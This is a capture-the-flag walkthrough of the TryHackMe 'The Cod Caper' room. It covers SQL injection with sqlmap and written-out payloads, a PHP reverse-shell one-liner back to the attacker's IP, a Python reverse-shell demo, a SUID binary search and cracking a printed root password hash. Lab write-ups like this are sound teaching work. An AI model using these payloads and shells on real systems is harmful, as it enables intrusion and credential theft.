My solution for the room "The Cod Caper" on TryHackMe
https://tryhackme.com/room/thecodcaper
The first step is to see what ports and services are running on the target machine. Recommended Tool - nmap: Useful flags: -p -sC -A
To answer these questions we need to scan the machine with nmap and analyse the results:
nmap -A <IP> -vv
We can see that there are two ports open: 22 with the SSH service and 80 with HTTP. (Without -p, nmap -A only scans the 1000 most common TCP ports; add -p- to cover all 65535 if the count looks suspiciously low.)
Question 1: How many ports are open on the target machine?
2
Question 2: What is the http-title of the web server?
Apache2 Ubuntu Default Page: It works
Question 3: What version is the ssh service?
OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Question 4: What is the version of the web server?
Apache/2.4.18
Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available on the web server. Recommended tool: gobuster. Useful flags: -x --url --wordlist
Recommended wordlist: big.txt
If we open the IP in a browser we see the Apache2 Ubuntu default page.
Now let's scan the IP with gobuster to enumerate directories and files:
gobuster dir -u http://IP/ -w big.txt -x .php,.html,.txt
There it is: we found the important file!
Question 1 : What is the name of the important file on the server?
administrator.php
The admin page seems to give us a login form. In situations like this it is always worth it to check for "low-hanging fruit". In the case of login forms one of the first things to check for is SQL Injection.
Recommended Tool: sqlmap
Useful Flags: -u --forms --dump -a
On the page IP/administrator.php we have an administrator login form.
Let's try SQL injection with sqlmap (clone it if it is not already installed):
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
First we need to capture the login POST request with Burp Suite,
then save it in a .txt file and pass it to sqlmap with -r:
sqlmap -r request.txt -D users --tables
sqlmap confirms the form is injectable and lists the tables in the users database (to enumerate the databases themselves first, run it with --dbs instead).
Let's dump the "users" table:
sqlmap -r request.txt -D users -T users --dump
Here are the username and password!
Question 1: What is the admin username?
Question 2: What is the admin password?
Question 3: How many forms of SQLI is the form vulnerable to?
3
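To show what the form behind administrator.php is vulnerable to, here is an added example (not code from the room or from sqlmap) that builds the same kind of login query two ways against an in-memory SQLite table with invented credentials: concatenated, where a tautology in the password field bypasses the check and a UNION in the username field reads the password column (the manual version of what sqlmap --dump automates), and parameterised, where the same payloads are just strings. The table layout and credentials are assumptions for the example, not what the box holds.

```python
import sqlite3


def setup_db():
    # Constructed stand-in for the room's "users" database; the credentials are
    # invented for this example, not the ones sqlmap dumps from the box.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Example-Pass-123')")
    return conn


def login_vulnerable(conn, username, password):
    """Login query built by string concatenation: the bug class sqlmap finds."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(query).fetchall()]


def login_safe(conn, username, password):
    """Same check with bound parameters: user input can never change the SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password)).fetchall()]


# Payloads. The tautology in the password field turns the WHERE clause into
# (username = 'admin' AND password = '') OR '1'='1', true for every row.
# The UNION in the username field (with -- commenting out the rest of the query)
# appends the password column of the whole table to the result set.
BYPASS_PASSWORD = "' OR '1'='1"
UNION_USERNAME = "' UNION SELECT password FROM users --"

if __name__ == "__main__":
    db = setup_db()
    print("normal, wrong password :", login_vulnerable(db, "admin", "nope"))
    print("tautology bypass       :", login_vulnerable(db, "admin", BYPASS_PASSWORD))
    print("UNION extraction       :", login_vulnerable(db, UNION_USERNAME, "x"))
    print("parameterised, bypass  :", login_safe(db, "admin", BYPASS_PASSWORD))
    print("parameterised, UNION   :", login_safe(db, UNION_USERNAME, "x"))
```

The parameterised version is the fix: the driver sends the SQL and the values separately, so a quote in the input never terminates the string literal.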
It seems we have gained the ability to run commands! Since this is my old PC, I should still have a user account! Let's run a few test commands, and then try to gain access!
Now we have the credentials found with sqlmap, so let's log in.
Since the admin page lets us run commands on the box, let's use it to get a reverse shell with netcat.
First prepare a PHP one-liner to run through it (replace YOUR IP with the IP of the attacking machine):
php -r '$sock=fsockopen("YOUR IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Don't forget to start a netcat listener on port 4444 on the attacking machine before running it.
If everything went well we now have a shell on the target machine.
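To make the mechanics of the PHP one-liner concrete, here is an added example (not from the room) of both halves of a reverse shell over loopback in Python: the listener plays the part of netcat on the attacking machine, the connect-back side plays the target. It is deliberately one-shot, one command in and its output back, rather than the interactive /bin/sh -i the one-liner spawns, so it can run and be checked locally; host, port and the demo command are arbitrary.

```python
import socket
import subprocess
import threading


def start_listener(host="127.0.0.1", port=0):
    """Attacker side: the role 'nc -lvnp 4444' plays. port=0 picks a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def handle_callback(srv, command, timeout=10):
    """Wait for the target to connect back, send one command, collect its output."""
    srv.settimeout(timeout)
    conn, _peer = srv.accept()
    with conn:
        conn.settimeout(timeout)
        conn.sendall(command.encode() + b"\n")
        conn.shutdown(socket.SHUT_WR)          # nothing more to send
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:                       # target closed: output is complete
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def connect_back(host, port, timeout=10):
    """Target side: the connection is outbound, which is why it gets past inbound-only filtering."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        cmd = s.makefile("rb").readline().decode().strip()
        # The PHP one-liner hands the socket to /bin/sh -i as stdin/stdout/stderr;
        # here one command is run through the shell and its output sent back instead.
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        s.sendall((result.stdout + result.stderr).encode())


def demo(command):
    """Run both halves over loopback and return the output the listener received."""
    srv = start_listener()
    port = srv.getsockname()[1]
    target = threading.Thread(target=connect_back, args=("127.0.0.1", port))
    target.start()
    try:
        return handle_callback(srv, command)
    finally:
        target.join()
        srv.close()


if __name__ == "__main__":
    print(demo("id; pwd"))
```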
Question 1: How many files are in the current directory?
3
Question 2: Do I still have an account
yes
Question 3: What is my ssh password?
To answer this question I searched through the machine; the path is the following:
/var/hidden/pass
Question 1: What is the interesting path of the interesting suid file
My solution:
First connect over SSH with the private key found at
/home/pingu/.ssh/id_rsa
Copy it into a file on the attacking machine (ssh refuses a key file that other users can read, so restrict its permissions to the owner only) and log in:
ssh -i ssh_key.txt pingu@IP
Now we have to find the path of the SUID file. SUID is a special permission bit on executable files that lets other users run the file with the effective permissions of the file's owner, which is why an unusual SUID binary is a privilege escalation candidate.
I searched on the internet and found this command, which lists all binaries with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
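An added example (not from the room) of what the find command does and of the follow-up step it leaves to you: walk a tree, keep the regular files with the setuid bit, and drop the ones in a baseline of stock SUID binaries so the odd one stands out. The tree, the files in it and the baseline are constructed for the example; a real baseline would be the SUID list taken from a clean install of the same distribution.

```python
import os
import stat
import tempfile


def find_suid(root):
    """Equivalent of `find ROOT -perm -u=s -type f 2>/dev/null`: regular files with the setuid bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: like find, do not follow symlinks
            except OSError:                    # the 2>/dev/null part: unreadable entries are skipped
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(paths, baseline, root):
    """Strip ROOT so paths compare like absolute system paths, then drop the known-good ones."""
    rel = ["/" + os.path.relpath(p, root) for p in paths]
    return sorted(p for p in rel if p not in baseline)


def build_demo_tree():
    """Constructed mini filesystem: two stock-looking SUID files, one odd SUID binary, one plain file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    for rel, mode in [("bin/su", 0o4755), ("usr/bin/passwd", 0o4755),
                      ("opt/secret/helper", 0o4755), ("bin/ls", 0o755)]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\necho demo\n")
        os.chmod(path, mode)                   # 0o4000 is the setuid bit
    return root


# Assumed baseline for the demo tree only; not a real distribution's SUID list.
DEMO_BASELINE = {"/bin/su", "/usr/bin/passwd"}


def demo():
    root = build_demo_tree()
    return unexpected_suid(find_suid(root), DEMO_BASELINE, root)


if __name__ == "__main__":
    print(demo())
```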
No answer needed
No answer needed
No answer needed
Now that we have the password hashes, we can crack them and get the root password! Recall from the previous outputs that our root password hash is
$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.
Usage: hashcat {flags} {hashfile} {wordlist}
Hint: the hashcat mode is 1800
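Before feeding the hash to hashcat it is worth confirming what it is. Here is an added example (not from the room) that parses a modular-crypt hash or an /etc/shadow line, checks the salt and digest lengths, picks the matching hashcat mode (1800 for the $6$ sha512crypt form above) and assembles the hashcat command line in the shape of the usage line from the task. The shadow lines are constructed around the root hash quoted in the task; the file names are placeholders.

```python
import re

# Modular-crypt prefixes seen in /etc/shadow: name, hashcat mode, digest length in chars
ALGORITHMS = {
    "1": ("md5crypt", 500, 22),
    "5": ("sha256crypt", 7400, 43),
    "6": ("sha512crypt", 1800, 86),
}
CRYPT_RE = re.compile(
    r"^\$(?P<id>[156])\$(?:rounds=(?P<rounds>\d+)\$)?"
    r"(?P<salt>[./0-9A-Za-z]{1,16})\$(?P<digest>[./0-9A-Za-z]+)$"
)

# Root hash quoted in the task
ROOT_HASH = ("$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9"
             "UtDS8PFzCk902AsWx00Ck.")


def parse_crypt_hash(value):
    """Split $id$[rounds=N$]salt$digest and sanity-check it before spending GPU time on it."""
    m = CRYPT_RE.match(value.strip())
    if not m:
        raise ValueError("not a $1$/$5$/$6$ modular-crypt hash")
    name, mode, digest_len = ALGORITHMS[m.group("id")]
    digest = m.group("digest")
    if len(digest) != digest_len:
        raise ValueError(f"{name} digest should be {digest_len} chars, got {len(digest)}")
    if m.group("rounds"):
        rounds = int(m.group("rounds"))
    else:
        rounds = 1000 if m.group("id") == "1" else 5000   # the algorithms' fixed/default counts
    return {"algorithm": name, "hashcat_mode": mode, "rounds": rounds,
            "salt": m.group("salt"), "digest": digest}


def parse_shadow_line(line):
    """Return (user, parsed hash) for a crackable /etc/shadow entry, None for locked or empty ones."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        return None
    user, pw = fields[0], fields[1]
    if not pw or pw[0] in "*!":                # locked or password-less accounts
        return None
    return user, parse_crypt_hash(pw)


def hashcat_argv(hash_file, wordlist, parsed):
    """Command line matching the task's usage: hashcat {flags} {hashfile} {wordlist}. -a 0 is dictionary mode."""
    return ["hashcat", "-m", str(parsed["hashcat_mode"]), "-a", "0", hash_file, wordlist]


if __name__ == "__main__":
    # Constructed shadow lines: the task's root hash plus a locked service account
    shadow = ["root:" + ROOT_HASH + ":18000:0:99999:7:::",
              "daemon:*:17737:0:99999:7:::"]
    for line in shadow:
        entry = parse_shadow_line(line)
        if entry:
            user, info = entry
            print(user, info["algorithm"], "rounds", info["rounds"], "salt", info["salt"])
            print(" ".join(hashcat_argv("root.hash", "rockyou.txt", info)))
```

The digest-length check catches the usual copy-paste accident of losing the trailing character of the hash, which otherwise shows up only as hashcat rejecting the line.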
Enjoy